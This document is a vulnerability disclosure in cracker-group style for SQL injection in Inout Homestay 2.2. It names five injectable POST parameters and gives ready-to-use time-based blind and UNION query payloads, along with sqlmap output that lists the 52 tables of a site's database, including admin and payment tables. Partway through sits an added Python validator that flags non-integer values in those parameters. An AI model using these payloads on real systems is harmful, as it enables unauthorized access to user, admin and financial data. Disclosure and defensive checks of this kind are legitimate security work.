--------------------------------------------------------------
C r a C k E r
T H E   C R A C K   O F   E T E R N A L   M I G H T
Unimaginable Crack ….
--------------------------------------------------------------
[Vulnerability]
--------------------------------------------------------------
Author    : CraCkEr
Website   : inoutscripts.com
Vendor    : Inout Scripts – Nesote Technologies Private Limited
Software  : Inout Homestay 2.2
Vuln Type : SQL Injection
Impact    : Database Access
--------------------------------------------------------------
Release Notes:

SQL injection attacks can allow unauthorized access to sensitive data and modification of
data, and can crash the application or make it unavailable, leading to lost revenue and
damage to a company’s reputation.
--------------------------------------------------------------
Greets:
Raz0r and The_PitBull.
CryptoJob (Twitter) twitter.com/CryptozJob
--------------------------------------------------------------
CraCkEr 2023 (c)
--------------------------------------------------------------
Path: /index.php?page=search/searchdetailed
broom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=Indianapolis
SQLi vulnerability in the POST parameter “broom”
SQLi vulnerability in the POST parameter “bathr”
SQLi vulnerability in the POST parameter “beds”
SQLi vulnerability in the POST parameter “numguest”
Path: /index.php?page=search/rentals
location=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=Indiana
SQLi vulnerability in the POST parameter “guests”
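
A defensive check for the five POST parameters listed above, as an added example (not code from the advisory or the vendor). It assumes these fields are meant to hold small non-negative integers, as the clean sample values suggest; `check_search_post`, `NUMERIC_PARAMS` and the three-digit limit are hypothetical names and choices.

```python
import re
from urllib.parse import parse_qsl

# Assumption: these POST parameters carry small non-negative integers
# (the clean sample values in the advisory are 1 and 2).
NUMERIC_PARAMS = {
    "search/searchdetailed": ("broom", "bathr", "beds", "numguest"),
    "search/rentals": ("guests",),
}
# [0-9] rather than \d, so Unicode digit look-alikes are rejected too.
STRICT_INT = re.compile(r"[0-9]{1,3}")


def check_search_post(page, body):
    """Return {param: reason} for each numeric parameter that fails validation."""
    expected = NUMERIC_PARAMS.get(page, ())
    seen = {}
    # keep_blank_values=True so an empty value is reported, not silently dropped.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in expected:
            seen.setdefault(name, []).append(value)
    findings = {}
    for name in expected:
        values = seen.get(name, [])
        if len(values) > 1:
            # Duplicates can make a filter and the application read different values.
            findings[name] = "repeated parameter"
        elif values and not STRICT_INT.fullmatch(values[0]):
            findings[name] = "not a plain integer: %r" % values[0][:40]
    return findings


# Constructed sample bodies, trimmed from the requests shown in the advisory.
CLEAN = "broom=1&bathr=1&beds=1&numguest=2&page=1&type=2&type=2"
TAMPERED = ("broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)"
            "&bathr=1&beds=1&numguest=2")

if __name__ == "__main__":
    for body in (CLEAN, TAMPERED):
        print(check_search_post("search/searchdetailed", body) or "ok")
```

A filter like this suits a request gateway or log review; the fix in the application itself is to cast these values to integers and bind them in prepared statements.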
---
Parameter: broom (POST)
Type: time-based blind
Title: MySQL >= 5.12.12 AND time-based blind (query SLEEP)
Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split
Type: UNION query
Title: Generic UNION query (NULL) – 27 columns
Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL– -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching tables for database: '*****_homestay'
Database: *****_homestay
[52 tables]
+----------------------------------+
| admin_account                    |
| admin_payment_details            |
| category_property                |
| chat_details                     |
| chat_messages                    |
| checkout_ipn                     |
| countries                        |
| coupon_detail                    |
| cron_details                     |
| custom_field                     |
| demo_message                     |
| email_details                    |
| email_templates                  |
| forgetpassword                   |
| host_rejected                    |
| inout_ipns                       |
| languages                        |
| list_date_request                |
| list_images                      |
| listing_date                     |
| listing_detail                   |
| listing_main                     |
| message_notify_app               |
| messages                         |
| msg_req_temp                     |
| ppc_currency                     |
| public_side_media_detail         |
| public_slide_images              |
| refund_creditupdate              |
| request_coupon_detail            |
| settings                         |
| superhost_detail                 |
| traveller_bank_deposit_history   |
| traveller_cancellation_modes     |
| traveller_cancelled              |
| user_account_detail              |
| user_address_verify_request      |
| user_details                     |
| user_email_verification          |
| user_listing_request             |
| user_refunddetails               |
| user_registration                |
| user_reviews                     |
| user_search_details              |
| user_settings                    |
| user_wishlist_mapping            |
| user_withdrawal_details          |
| userabusereport                  |
| userbank_pending_listing_request |
| usercancellationsaction          |
| wish_list                        |
| withdrawal_request               |
+----------------------------------+
[-] Done